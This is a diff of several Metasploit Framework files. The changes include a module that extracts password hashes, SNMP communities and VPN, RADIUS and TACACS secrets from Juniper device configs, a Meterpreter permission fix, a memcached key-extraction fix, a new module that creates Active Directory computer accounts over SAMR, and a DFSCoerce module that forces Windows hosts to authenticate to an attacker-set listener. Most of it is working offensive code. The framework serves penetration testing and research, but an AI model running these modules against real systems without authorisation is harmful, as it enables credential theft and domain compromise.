-    # set snmp community "sales" Read-Write Trap-on traffic version v1
-    config.scan(/set snmp community "(?<snmp_community>[a-z0-9]+)" (?<snmp_permissions>Read-Write|Read-Only)/i).each do |result|
-      snmp_community = result[0].strip
-      snmp_permissions = result[1].strip
-      print_good("SNMP community #{snmp_community} with permissions #{snmp_permissions}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      if snmp_permissions.downcase == 'read-write'
-        cred[:access_level] = 'RW'
-      else
-        cred[:access_level] = 'RO'
-      end
-      cred[:protocol] = 'udp'
-      cred[:port] = 161
-      cred[:service_name] = 'snmp'
-      cred[:private_data] = snmp_community
-      cred[:private_type] = :password
-      create_credential_and_login(cred)
-    end
-
-    # ppp
-    # Example lines:
-    # setppp profile "ISP" auth type pap
-    # setppp profile "ISP" auth local-name "username"
-    # setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="
-    config.scan(/setppp profile "(?<ppp_name>[a-z0-9]+)" auth type (?<ppp_authtype>[a-z]+).+setppp profile "\k<ppp_name>" auth local-name "(?<ppp_username>[a-z0-9]+)".+setppp profile "\k<ppp_name>" auth secret "(?<ppp_hash>.+)"/mi).each do |result|
-      ppp_name = result[0].strip
-      ppp_username = result[2].strip
-      ppp_hash = result[3].strip
-      ppp_authtype = result[1].strip
-      print_good("PPTP Profile #{ppp_name} with username #{ppp_username} hash #{ppp_hash} via #{ppp_authtype}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = ppp_username
-      cred[:private_data] = ppp_hash
-      cred[:service_name] = 'pptp'
-      cred[:port] = 1723
-      create_credential_and_login(cred)
-    end
-
-    # ike
-    # Example lines:
-    # set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"
-    config.scan(/set ike gateway "(?<ike_name>.+)" address (?<ike_address>[0-9.]+) Main outgoing-interface ".+" preshare "(?<ike_password>.+)" proposal "(?<ike_method>.+)"/i).each do |result|
-      ike_name = result[0].strip
-      ike_address = result[1].strip
-      ike_password = result[2].strip
-      ike_method = result[3].strip
-      print_good("IKE Profile #{ike_name} to #{ike_address} with password #{ike_password} via #{ike_method}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:private_data] = ike_password
-      cred[:private_type] = :password
-      cred[:service_name] = 'ike'
-      cred[:port] = 500
-      cred[:address] = ike_address
-      cred[:protocol] = 'udp'
-      create_credential_and_login(cred)
-    end
-
-  end
-
-
-  def juniper_junos_config_eater(thost, tport, config)
-
-   report_host({
-      :host => thost,
-      :os_name => 'Juniper JunOS'
-    })
-
-
-    if framework.db.active
-      credential_data = {
-        address: thost,
-        port: tport,
-        protocol: 'tcp',
-        workspace_id: myworkspace_id,
-        origin_type: :service,
-        private_type: :nonreplayable_hash,
-        service_name: '',
-        module_fullname: self.fullname,
-        status: Metasploit::Model::Login::Status::UNTRIED
-      }
-    end
-
-    store_loot('juniper.junos.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper JunOS Configuration')
-
-    # we'll take out the pretty format so its easier to regex
-    config = config.split("\n").join('')
-
-    # Example:
-    #system {
-    #  root-authentication {
-    #    encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
-    #  }
-    #}
-    if /root-authentication[\s]+\{[\s]+encrypted-password "(?<root_hash>[^"]+)";/i =~ config
-      root_hash = root_hash.strip
-      jtr_format = identify_hash root_hash
-
-      print_good("root password hash: #{root_hash}")
       if framework.db.active
+        credential_data = {
+          address: thost,
+          port: tport,
+          protocol: 'tcp',
+          workspace_id: myworkspace_id,
+          origin_type: :service,
+          service_name: '',
+          private_type: :nonreplayable_hash,
+          module_fullname: fullname,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+      end
+
+      store_loot('juniper.netscreen.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')
+
+      # admin name and password
+      # Example lines:
+      # set admin name "netscreen"
+      # set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
+      config.scan(/set admin name "(?<admin_name>[a-z0-9]+)".+set admin password "(?<admin_password_hash>[a-z0-9]+)"/mi).each do |result|
+        admin_name = result[0].strip
+        admin_hash = result[1].strip
+        print_good("Admin user #{admin_name} found with password hash #{admin_hash}")
+        next unless framework.db.active
+
         cred = credential_data.dup
-        cred[:username] = 'root'
-        cred[:jtr_format] = jtr_format
-        cred[:private_data] = root_hash
+        cred[:username] = admin_name
+        cred[:private_data] = admin_hash
+        create_credential_and_login(cred)
+      end
+
+      # user account
+      # Example lines:
+      # set user "testuser" uid 1
+      # set user "testuser" type auth
+      # set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
+      # set user "testuser" enable
+      config.scan(/set user "(?<user_name>[a-z0-9]+)" uid (?<user_uid>\d+).+set user "\k<user_name>" type (?<user_type>\w+).+set user "\k<user_name>" hash-password "(?<user_hash>[0-9a-z=]{38})".+set user "\k<user_name>" (?<user_enable>enable).+/mi).each do |result|
+        user_name = result[0].strip
+        user_uid = result[1].strip
+        user_enable = result[4].strip
+        user_hash = result[3].strip
+        print_good("User #{user_uid} named #{user_name} found with password hash #{user_hash}. Enable permission: #{user_enable}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = user_name
+        cred[:jtr_format] = 'sha1'
+        cred[:private_data] = user_hash
+        create_credential_and_login(cred)
+      end
+
+      # snmp
+      # Example lines:
+      # set snmp community "sales" Read-Write Trap-on traffic version v1
+      config.scan(/set snmp community "(?<snmp_community>[a-z0-9]+)" (?<snmp_permissions>Read-Write|Read-Only)/i).each do |result|
+        snmp_community = result[0].strip
+        snmp_permissions = result[1].strip
+        print_good("SNMP community #{snmp_community} with permissions #{snmp_permissions}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        if snmp_permissions.downcase == 'read-write'
+          cred[:access_level] = 'RW'
+        else
+          cred[:access_level] = 'RO'
+        end
+        cred[:protocol] = 'udp'
+        cred[:port] = 161
+        cred[:service_name] = 'snmp'
+        cred[:private_data] = snmp_community
+        cred[:private_type] = :password
+        create_credential_and_login(cred)
+      end
+
+      # ppp
+      # Example lines:
+      # setppp profile "ISP" auth type pap
+      # setppp profile "ISP" auth local-name "username"
+      # setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="
+      config.scan(/setppp profile "(?<ppp_name>[a-z0-9]+)" auth type (?<ppp_authtype>[a-z]+).+setppp profile "\k<ppp_name>" auth local-name "(?<ppp_username>[a-z0-9]+)".+setppp profile "\k<ppp_name>" auth secret "(?<ppp_hash>.+)"/mi).each do |result|
+        ppp_name = result[0].strip
+        ppp_username = result[2].strip
+        ppp_hash = result[3].strip
+        ppp_authtype = result[1].strip
+        print_good("PPTP Profile #{ppp_name} with username #{ppp_username} hash #{ppp_hash} via #{ppp_authtype}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = ppp_username
+        cred[:private_data] = ppp_hash
+        cred[:service_name] = 'pptp'
+        cred[:port] = 1723
+        create_credential_and_login(cred)
+      end
+
+      # ike
+      # Example lines:
+      # set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"
+      config.scan(/set ike gateway "(?<ike_name>.+)" address (?<ike_address>[0-9.]+) Main outgoing-interface ".+" preshare "(?<ike_password>.+)" proposal "(?<ike_method>.+)"/i).each do |result|
+        ike_name = result[0].strip
+        ike_address = result[1].strip
+        ike_password = result[2].strip
+        ike_method = result[3].strip
+        print_good("IKE Profile #{ike_name} to #{ike_address} with password #{ike_password} via #{ike_method}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:private_data] = ike_password
+        cred[:private_type] = :password
+        cred[:service_name] = 'ike'
+        cred[:port] = 500
+        cred[:address] = ike_address
+        cred[:protocol] = 'udp'
         create_credential_and_login(cred)
       end
     end
 
-    # access privileges https://kb.juniper.net/InfoCenter/index?page=content&id=KB10902
-    config.scan(/user (?<user_name>[^\s]+) {[\s]+ uid (?<user_uid>[\d]+);[\s]+ class (?<user_permission>super-user|operator|read-only|unauthorized);[\s]+ authentication {[\s]+encrypted-password "(?<user_hash>[^\s]+)";/i).each do |result|
-      user_name = result[0].strip
-      user_uid  = result[1].strip
-      user_permission = result[2].strip
-      user_hash = result[3].strip
-      jtr_format = identify_hash user_hash
+    def juniper_junos_config_eater(thost, tport, config)
+      report_host({
+        host: thost,
+        os_name: 'Juniper JunOS'
+      })
 
-      print_good("User #{user_uid} named #{user_name} in group #{user_permission} found with password hash #{user_hash}.")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = user_name
-      cred[:jtr_format] = jtr_format
-      cred[:private_data] = user_hash
-      create_credential_and_login(cred)
-    end
-
-    # https://supportf5.com/csp/article/K6449 special characters allowed in snmp community strings
-    config.scan(/community "?(?<snmp_community>[\w\d\s\(\)\.\*\/-:_\?=@\,&%\$]+)"? {(\s+view [\w\-]+;)?\s+authorization read-(?<snmp_permission>only|write)/i).each do |result|
-      snmp_community = result[0].strip
-      snmp_permissions = result[1].strip
-      print_good("SNMP community #{snmp_community} with permissions read-#{snmp_permissions}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      if snmp_permissions.downcase == 'write'
-        cred[:access_level] = 'RW'
-      else
-        cred[:access_level] = 'RO'
+      if framework.db.active
+        credential_data = {
+          address: thost,
+          port: tport,
+          protocol: 'tcp',
+          workspace_id: myworkspace_id,
+          origin_type: :service,
+          private_type: :nonreplayable_hash,
+          service_name: '',
+          module_fullname: fullname,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
       end
-      cred[:protocol] = 'udp'
-      cred[:port] = 161
-      cred[:private_data] = snmp_community
-      cred[:private_type] = :password
-      cred[:service_name] = 'snmp'
-      create_credential_and_login(cred)
-    end
 
-    config.scan(/radius-server \{[\s]+(?<radius_server>[0-9\.]{7,15}) secret "(?<radius_hash>[^"]+)";/i).each do |result|
-      radius_hash = result[1].strip
-      radius_server = result[0].strip
-      print_good("radius server #{radius_server} password hash: #{radius_hash}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:address] = radius_server
-      cred[:port] = 1812
-      cred[:protocol] = 'udp'
-      cred[:private_data] = radius_hash
-      cred[:service_name] = 'radius'
-      create_credential_and_login(cred)
-    end
+      store_loot('juniper.junos.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper JunOS Configuration')
 
-    config.scan(/pap {[\s]+local-name "(?<ppp_username>.+)";[\s]+local-password "(?<ppp_hash>[^"]+)";/i).each do |result|
-      ppp_username = result[0].strip
-      ppp_hash = result[1].strip
-      print_good("PPTP username #{ppp_username} hash #{ppp_hash} via PAP")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = ppp_username
-      cred[:private_data] = ppp_hash
-      cred[:service_name] = 'pptp'
-      cred[:port] = 1723
-      create_credential_and_login(cred)
-    end
+      # we'll take out the pretty format so its easier to regex
+      config = config.split("\n").join('')
 
+      # Example:
+      # system {
+      #  root-authentication {
+      #    encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
+      #  }
+      # }
+      if /root-authentication\s+\{\s+encrypted-password "(?<root_hash>[^"]+)";/i =~ config
+        root_hash = root_hash.strip
+        jtr_format = identify_hash root_hash
+
+        print_good("root password hash: #{root_hash}")
+        if framework.db.active
+          cred = credential_data.dup
+          cred[:username] = 'root'
+          cred[:jtr_format] = jtr_format
+          cred[:private_data] = root_hash
+          create_credential_and_login(cred)
+        end
+      end
+
+      # access privileges https://kb.juniper.net/InfoCenter/index?page=content&id=KB10902
+      config.scan(/user (?<user_name>[^\s]+) {(\s+ full-name (?<fullname>[^;]+);)?\s+ uid (?<user_uid>\d+);\s+ class (?<user_permission>super-user|operator|read-only|unauthorized|[^;]+);\s+ authentication {\s+encrypted-password "(?<user_hash>[^\s]+)";/i).each do |result|
+        user_name = result[0].strip
+        user_uid = result[2].strip
+        user_permission = result[3].strip
+        user_hash = result[4].strip
+        jtr_format = identify_hash user_hash
+
+        print_good("User #{user_uid} named #{user_name} in group #{user_permission} found with password hash #{user_hash}.")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = user_name
+        cred[:jtr_format] = jtr_format
+        cred[:private_data] = user_hash
+        create_credential_and_login(cred)
+      end
+
+      # https://supportf5.com/csp/article/K6449 special characters allowed in snmp community strings
+      config.scan(%r{community "?(?<snmp_community>[\w\d\s().*/-:_?=@,&%$+!]+)"? \{(\s+view [\w\-]+;)?\s+authorization read-(?<snmp_permission>only|write)}i).each do |result|
+        snmp_community = result[0].strip
+        snmp_permissions = result[1].strip
+        print_good("SNMP community #{snmp_community} with permissions read-#{snmp_permissions}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        if snmp_permissions.downcase == 'write'
+          cred[:access_level] = 'RW'
+        else
+          cred[:access_level] = 'RO'
+        end
+        cred[:protocol] = 'udp'
+        cred[:port] = 161
+        cred[:private_data] = snmp_community
+        cred[:private_type] = :password
+        cred[:service_name] = 'snmp'
+        create_credential_and_login(cred)
+      end
+
+      # radius-server
+      config.scan(/\s*radius-server \{([^}]+)\}/i).each do |result_block|
+        result_block[0].strip.scan(/(?<radius_server>[0-9.]{7,15}) secret "(?<radius_hash>[^"]+)";/i).each do |result|
+          radius_hash = result[1].strip
+          radius_server = result[0].strip
+          print_good("radius server #{radius_server} password hash: #{radius_hash}")
+          next unless framework.db.active
+
+          cred = credential_data.dup
+          cred[:address] = radius_server
+          cred[:port] = 1812
+          cred[:protocol] = 'udp'
+          cred[:private_data] = radius_hash
+          cred[:service_name] = 'radius'
+          create_credential_and_login(cred)
+        end
+      end
+
+      # tacplus-server
+      config.scan(/\s*tacplus-server \{([^}]+)\}/i).each do |result_block|
+        result_block[0].strip.scan(/(?<tacplus_server>[0-9.]{7,15}) secret "(?<hash>[^"]+)";/i).each do |result|
+          ip = result[0].strip
+          hash = result[1].strip
+          jtr_format = identify_hash hash
+          print_good("tacplus server #{ip} with password hash #{hash}")
+          next unless framework.db.active
+
+          cred = credential_data.dup
+          cred[:jtr_format] = jtr_format
+          cred[:private_data] = hash
+          create_credential_and_login(cred)
+        end
+      end
+
+      config.scan(/pap {\s+local-name "(?<ppp_username>.+)";\s+local-password "(?<ppp_hash>[^"]+)";/i).each do |result|
+        ppp_username = result[0].strip
+        ppp_hash = result[1].strip
+        print_good("PPTP username #{ppp_username} hash #{ppp_hash} via PAP")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = ppp_username
+        cred[:private_data] = ppp_hash
+        cred[:service_name] = 'pptp'
+        cred[:port] = 1723
+        create_credential_and_login(cred)
+      end
+    end
   end
 end
-end
-

lib/msf/core/exploit/cmd_stager.rb

@@ -67,6 +67,7 @@ module Exploit::CmdStager
         OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
         OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
         OptString.new('CMDSTAGER::TEMP', [false, 'Writable directory for staged files']),
+        OptString.new('CMDSTAGER::URIPATH', [false, 'Payload URI path for supported stagers']),
         OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])
       ], self.class)
   end
@@ -147,6 +148,7 @@ module Exploit::CmdStager
 
     if stager_instance.respond_to?(:http?) && stager_instance.http?
       opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)
+      opts['Path'] = datastore['CMDSTAGER::URIPATH'] unless datastore['CMDSTAGER::URIPATH'].blank?
       opts[:payload_uri] = start_service(opts)
     end
 

lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb

@@ -63,15 +63,15 @@ class Process < Rex::Post::Process
       perms = PROCESS_ALL
     end
 
-    if (perms & PROCESS_READ)
+    if (perms & PROCESS_READ) > 0
       real_perms |= PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
     end
 
-    if (perms & PROCESS_WRITE)
+    if (perms & PROCESS_WRITE) > 0
       real_perms |= PROCESS_SET_SESSIONID | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE | PROCESS_SET_QUOTA | PROCESS_SET_INFORMATION
     end
 
-    if (perms & PROCESS_EXECUTE)
+    if (perms & PROCESS_EXECUTE) > 0
       real_perms |= PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_CREATE_PROCESS | PROCESS_SUSPEND_RESUME
     end
 

modules/auxiliary/admin/dcerpc/samr_computer.rb

@@ -0,0 +1,249 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb/dcerpc/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAMR Computer Management',
+        'Description' => %q{
+          Add, lookup and delete computer accounts via MS-SAMR. By default
+          standard active directory users can add up to 10 new computers to the
+          domain. Administrative privileges however are required to delete the
+          created accounts.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'JaGoTu', # @jagotu Original Impacket code
+          'Spencer McIntyre',
+        ],
+        'References' => [
+          ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py'],
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Actions' => [
+          [ 'ADD_COMPUTER', { 'Description' => 'Add a computer account' } ],
+          [ 'DELETE_COMPUTER', { 'Description' => 'Delete a computer account' } ],
+          [ 'LOOKUP_COMPUTER', { 'Description' => 'Lookup a computer account' } ]
+        ],
+        'DefaultAction' => 'ADD_COMPUTER'
+      )
+    )
+
+    register_options([
+      OptString.new('COMPUTER_NAME', [ false, 'The computer name' ]),
+      OptString.new('COMPUTER_PASSWORD', [ false, 'The password for the new computer' ], conditions: %w[ACTION == ADD_COMPUTER]),
+      Opt::RPORT(445)
+    ])
+  end
+
+  def connect_samr
+    vprint_status('Connecting to Security Account Manager (SAM) Remote Protocol')
+    samr = @tree.open_file(filename: 'samr', write: true, read: true)
+
+    vprint_status('Binding to \\samr...')
+    samr.bind(endpoint: RubySMB::Dcerpc::Samr)
+    vprint_good('Bound to \\samr')
+
+    samr
+  end
+
+  def run
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+    report_service(
+      host: rhost,
+      port: rport,
+      host_name: simple.client.default_name,
+      proto: 'tcp',
+      name: 'smb',
+      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+    )
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    begin
+      @samr = connect_samr
+      @server_handle = @samr.samr_connect
+    rescue RubySMB::Dcerpc::Error::FaultError => e
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
+    end
+
+    if datastore['SMBDomain'].blank? || datastore['SMBDomain'] == '.'
+      all_domains = @samr.samr_enumerate_domains_in_sam_server(server_handle: @server_handle).map(&:to_s).map(&:encode)
+      all_domains.delete('Builtin')
+      if all_domains.empty?
+        fail_with(Failure::NotFound, 'No domains were found on the SAM server.')
+      elsif all_domains.length > 1
+        print_status("Enumerated domains: #{all_domains.join(', ')}")
+        fail_with(Failure::BadConfig, 'The SAM server has more than one domain, the target must be specified.')
+      end
+
+      @domain_name = all_domains.first
+      print_status("Using automatically identified domain: #{@domain_name}")
+    else
+      @domain_name = datastore['SMBDomain']
+    end
+
+    @domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: @domain_name)
+    @domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: @domain_sid)
+    send("action_#{action.name.downcase}")
+  rescue RubySMB::Dcerpc::Error::DcerpcError => e
+    elog(e.message, error: e)
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue RubySMB::Error::RubySMBError
+    elog(e.message, error: e)
+    fail_with(Failure::Unknown, e.message)
+  end
+
+  def random_hostname(prefix: 'DESKTOP')
+    "#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
+  end
+
+  def action_add_computer
+    if datastore['COMPUTER_NAME'].blank?
+      computer_name = random_hostname
+      4.downto(0) do |attempt|
+        break if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ]).nil?
+
+        computer_name = random_hostname
+        fail_with(Failure::BadConfig, 'Could not find an unused computer name.') if attempt == 0
+      end
+    else
+      computer_name = datastore['COMPUTER_NAME']
+      if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+        fail_with(Failure::BadConfig, 'The specified computer name already exists.')
+      end
+    end
+
+    result = @samr.samr_create_user2_in_domain(
+      domain_handle: @domain_handle,
+      name: computer_name,
+      account_type: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT,
+      desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
+    )
+
+    user_handle = result[:user_handle]
+    if datastore['COMPUTER_PASSWORD'].blank?
+      password = Rex::Text.rand_text_alphanumeric(32)
+    else
+      password = datastore['COMPUTER_PASSWORD']
+    end
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
+      member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
+        i1: {
+          password_expired: 1,
+          which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED
+        },
+        user_password: {
+          buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
+            password,
+            @simple.client.application_key
+          )
+        }
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
+      member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
+        user_account_control: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+    print_good("Successfully created #{@domain_name}\\#{computer_name} with password #{password}")
+    report_creds(@domain_name, computer_name, password)
+  end
+
+  def action_delete_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    fail_with(Failure::BadConfig, 'The specified computer was not found.') if details.nil?
+    details = details[computer_name]
+
+    handle = @samr.samr_open_user(domain_handle: @domain_handle, user_id: details[:rid])
+    @samr.samr_delete_user(user_handle: handle)
+    print_good('The specified computer has been deleted.')
+  end
+
+  def action_lookup_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    if details.nil?
+      print_error('The specified computer was not found.')
+      return
+    end
+    details = details[computer_name]
+    sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: details[:rid]).to_s
+    print_good("Found #{@domain_name}\\#{computer_name} (SID: #{sid})")
+  end
+
+  def report_creds(domain, username, password)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end

modules/auxiliary/gather/memcached_extractor.rb

@@ -54,12 +54,13 @@ class MetasploitModule < Msf::Auxiliary
   def enumerate_keys
     keys = []
     enumerate_slab_ids.each do |sid|
+      sock.send("stats cachedump #{sid} #{max_keys}\r\n", 0)
       loop do
-        sock.send("stats cachedump #{sid} #{max_keys}\r\n", 0)
         data = sock.recv(4096)
-        break if !data || data.length == 0 || data == "END\r\n"
+        break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
         matches = data.scan(/^ITEM (?<key>.*) \[/)
-        keys = keys + matches.flatten! if matches
+        break if matches.empty?
+        keys = keys + matches.flatten!
         break if data =~ /^END/
       end
     end
@@ -86,9 +87,10 @@ class MetasploitModule < Msf::Auxiliary
     sock.send("lru_crawler metadump all\r\n", 0)
     loop do
       data = sock.recv(4096)
-      break if !data || data.length == 0 || data == "END\r\n"
+      break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
       matches = data.scan(/^key=(?<key>.*) exp=/)
-      keys = keys + matches.flatten! if matches
+      break if matches.empty?
+      keys = keys + matches.flatten!
       break if data =~ /^END/
       data = ''
     end

modules/auxiliary/scanner/dcerpc/dfscoerce.rb

@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'windows_error'
+require 'ruby_smb'
+require 'ruby_smb/error'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Auxiliary::Scanner
+
+  Dfsnm = RubySMB::Dcerpc::Dfsnm
+
+  METHODS = %w[NetrDfsAddStdRoot NetrDfsRemoveStdRoot].freeze
+
+  def initialize
+    super(
+      'Name' => 'DFSCoerce',
+      'Description' => %q{
+        Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+      },
+      'Author' => [
+        'Wh04m1001',
+        'xct_de',
+        'Spencer McIntyre'
+      ],
+      'References' => [
+        [ 'URL', 'https://github.com/Wh04m1001/DFSCoerce' ]
+      ],
+      'License' => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptString.new('LISTENER', [ true, 'The host listening for the incoming connection', Rex::Socket.source_address ]),
+        OptEnum.new('METHOD', [ true, 'The RPC method to use for triggering', 'Automatic', ['Automatic'] + METHODS ])
+      ]
+    )
+  end
+
+  def connect_dfsnm
+    vprint_status('Connecting to Distributed File System (DFS) Namespace Management Protocol')
+    netdfs = @tree.open_file(filename: 'netdfs', write: true, read: true)
+
+    vprint_status('Binding to \\netdfs...')
+    netdfs.bind(endpoint: RubySMB::Dcerpc::Dfsnm)
+    vprint_good('Bound to \\netdfs')
+
+    netdfs
+  end
+
+  def run_host(_ip)
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    begin
+      dfsnm = connect_dfsnm
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      if e.status_code == ::WindowsError::NTStatus::STATUS_ACCESS_DENIED
+        fail_with(Failure::NoAccess, 'Connection failed (STATUS_ACCESS_DENIED)')
+      end
+
+      fail_with(Failure::UnexpectedReply, "Connection failed (#{e.status_code.name})")
+    rescue RubySMB::Dcerpc::Error::FaultError => e
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
+    end
+
+    begin
+      case datastore['METHOD']
+      when 'NetrDfsAddStdRoot'
+        dfsnm.netr_dfs_add_std_root(datastore['LISTENER'], 'share', comment: Faker::Hacker.say_something_smart)
+      when 'NetrDfsRemoveStdRoot', 'Automatic'
+        # use this technique by default, it's the original and doesn't require a comment
+        dfsnm.netr_dfs_remove_std_root(datastore['LISTENER'], 'share')
+      end
+    rescue RubySMB::Dcerpc::Error::DfsnmError => e
+      case e.status_code
+      when ::WindowsError::Win32::ERROR_ACCESS_DENIED
+        # this should be the response even if LISTENER captured the credentials (MSF, Responder, etc.)
+        print_good('Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful')
+      when ::WindowsError::Win32::ERROR_BAD_NETPATH
+        # this should be the response even if LISTENER was inaccessible
